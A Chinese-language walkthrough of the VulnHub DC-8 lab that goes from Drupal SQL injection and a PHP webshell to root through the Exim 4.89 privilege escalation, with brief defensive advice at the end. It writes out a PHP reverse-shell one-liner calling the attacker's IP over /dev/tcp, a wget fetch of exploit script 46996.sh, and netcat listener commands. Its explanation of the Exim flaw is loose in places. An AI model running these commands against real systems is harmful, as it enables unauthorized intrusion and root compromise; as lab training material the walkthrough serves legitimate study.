从Drupal后台到Root权限：手把手复现DC-8靶场的Exim 4.89提权漏洞

从Drupal后台到Root权限：手把手复现DC-8靶场的Exim 4.89提权漏洞

在渗透测试的学习过程中，靶机环境是检验和提升技能的最佳实践平台。DC-8作为VulnHub上经典的Drupal靶机，不仅包含了常见的Web应用漏洞，还隐藏着一个关键的提权突破口——Exim邮件服务的历史漏洞。本文将深入剖析如何从获取的Drupal后台权限出发，通过Exim 4.89的漏洞实现权限提升，最终获得系统root权限。

1. 环境准备与初始访问

在开始之前，我们需要确保具备以下基础环境：

• Kali Linux攻击机（建议2020以上版本）
• DC-8靶机（下载自VulnHub）
• 确保两者处于同一局域网段

典型网络配置示例：

# Kali攻击机IP配置检查 ifconfig eth0 | grep "inet " # 预期输出类似：inet 192.168.108.129 netmask 255.255.255.0

通过常规渗透测试流程，我们可以快速定位DC-8靶机的Web应用漏洞：

1. 使用nmap进行端口扫描，发现80端口运行Drupal 7
2. 通过sqlmap检测出SQL注入漏洞
3. 提取数据库中的用户凭证（john:turtle）
4. 登录Drupal后台并上传PHP webshell

关键反弹shell命令：

<?php system("bash -i > /dev/tcp/192.168.108.129/6868 0>&1"); ?>

2. 权限提升路径分析

获得初始shell后，我们需要系统性地寻找提权机会。以下是Linux系统中常见的提权检查清单：

• SUID权限检查：find / -perm -4000 -type f 2>/dev/null
• 内核版本检查：uname -a
• 安装的软件包：dpkg -l
• 计划任务：crontab -l
• 可写目录：find / -writable 2>/dev/null

在DC-8靶机中，最关键的发现是Exim邮件传输代理的SUID权限：

$ exim4 --version Exim version 4.89 # 存在已知漏洞的版本

3. Exim 4.89漏洞深度解析

Exim作为广泛使用的MTA软件，其4.89版本存在多个高危漏洞，其中最著名的是CVE-2019-10149（远程命令执行）和本地提权漏洞。我们将重点分析后者。

漏洞原理：

1. Exim以root权限运行并设置了SUID位
2. 特定参数组合可导致权限检查绕过
3. 通过精心构造的命令可实现任意命令执行

漏洞验证步骤：

1. 确认Exim版本：

   exim4 --version | head -n1

2. 检查可利用的公开EXP：

   searchsploit exim 4.89

3. 下载提权脚本（以46996.sh为例）：

   # 在攻击机启动HTTP服务 python3 -m http.server 8000 # 在靶机下载 wget http://192.168.108.129:8000/46996.sh -O /tmp/exploit.sh chmod +x /tmp/exploit.sh

4. 漏洞利用实战

46996.sh脚本提供了多种利用方式，我们选择最稳定的netcat方法：

./exploit.sh -m netcat

执行过程解析：

1. 脚本首先检查Exim版本和权限
2. 创建临时目录和必要的payload文件
3. 通过--version参数触发漏洞
4. 建立netcat反向连接获取root shell

关键参数说明：

成功执行后，我们将在攻击机获得root权限的shell：

# 攻击机监听 nc -lvnp 4444 # 连接成功后 whoami # 显示root

5. 防御建议与修复方案

虽然这是靶机环境，但了解防护措施同样重要：

系统管理员应：

1. 及时升级Exim到最新版本
2. 移除不必要的SUID权限：chmod u-s /usr/sbin/exim4
3. 实施最小权限原则

渗透测试人员应注意：

1. 在真实环境中必须获得授权
2. 使用漏洞利用脚本前应审查代码
3. 操作完成后清理痕迹

Exim的更新历史显示，该漏洞在后续版本中已被修复。建议所有使用Exim的服务都升级到4.92以上版本。

6. 技术延伸与思考

通过这个案例，我们可以总结出Linux系统提权的基本方法论：

1. 信息收集：全面了解系统环境
2. 漏洞匹配：将发现的服务与已知漏洞关联
3. 利用验证：选择最适合当前环境的利用方式
4. 权限维持：建立稳定的访问通道

在实际渗透测试中，遇到老旧服务时，可以优先考虑：

• 检查服务版本
• 搜索Exploit-DB和GitHub上的利用代码
• 测试多种利用方式

最后需要强调的是，这种提权方式在最新Linux发行版中已较难复现，但在一些IoT设备和遗留系统中仍可能遇到。保持对基础服务漏洞的关注，是安全研究人员的重要素养。